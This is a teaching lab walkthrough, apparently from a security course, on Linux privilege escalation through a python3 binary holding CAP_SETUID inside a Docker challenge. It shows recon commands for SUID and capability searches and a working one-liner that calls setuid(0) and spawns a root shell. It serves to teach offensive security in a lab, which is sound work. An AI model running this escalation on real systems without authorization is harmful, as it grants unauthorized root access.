Privesc With Capabilities demo

Our final privesc walk-through is for capabilities

We can find the challenge in /Week4_Privec/Demos/Capbility_Demo

Start it using docker-compose (as usual) and connect over SSH.

Initial Recon

Lets go through a more detailed recon process this time around.

Look for local files
check sudo rights
check for suid
check for capabilities.

Local Files

So we have python locally. But as it only has rights for our unprivileged user, there is nothing obvious here. We log that as unsual, and carry on our recon.

cueh@6f82719676f9:~$ ls -l
total 4748
-rwxr-xr-x 1 cueh cueh 4861504 Feb  8 21:07 python3

Sudo and SUID

Nothing on Sudo or SUID

cueh@e34bd83dcf83:~$  sudo -l
-bash: sudo: command not found

cueh@e34bd83dcf83:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/bin/mount
/bin/umount
/bin/ping
/bin/su

Capabilities

We will also do a search for all files with capabilities

cueh@e34bd83dcf83:~$ getcap -r / 2>/dev/null
/home/cueh/python3 = cap_setuid+ep

We can see there that the Python3 binary in our home directory has the CAP_SETUID capability. This means that the process can set or modify the user, when the process is running

This should let us become root if we can get our program to call the system level SETUID call.

Building an exploit

Pythons os module lets us call system level functionality. For example dealing with processes, or the environment.

It will also let us call the setuid() function. This requires root permissions, which we can get through the capabilities.

Our python program that can do this looks something like

import os
os.setuid(0)
os.system('/bin/sh')

We can also do this in a one liner using the -c flag.

cueh@6f82719676f9:~$ ./python3 -c "import os; os.setuid(0); os.system('/bin/sh')"
# id
uid=0(root) gid=1000(cueh) groups=1000(cueh)
#

Video

Tasks

Easytask

Follow through with the capabilities based walkthrough, and get the flag.